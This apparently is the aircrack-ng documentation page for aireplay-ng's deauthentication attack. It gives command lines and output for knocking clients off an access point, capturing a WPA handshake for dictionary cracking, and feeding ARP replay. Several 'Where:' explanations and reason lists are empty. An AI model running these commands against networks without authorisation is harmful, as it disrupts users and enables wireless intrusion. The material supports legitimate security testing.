This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Of course, this attack is totally useless if there are no associated wireless clients or on fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
First, you determine a client which is currently connected. You need the MAC address for the following command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
Here is what the output looks like:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
(switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
Here is the explanation of the above commands:
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
Where:
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0
(switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng/, you should run the airmon-ng script (unless you know what to type); otherwise the card won't be correctly set up for injection.
It is usually more effective to target a specific station using the -c parameter.
The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.
There can be several reasons and one or more can affect you:
See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.